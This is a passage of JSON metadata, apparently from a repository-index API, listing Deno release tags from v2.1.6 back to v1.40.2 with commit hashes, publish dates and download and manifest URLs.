-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https:/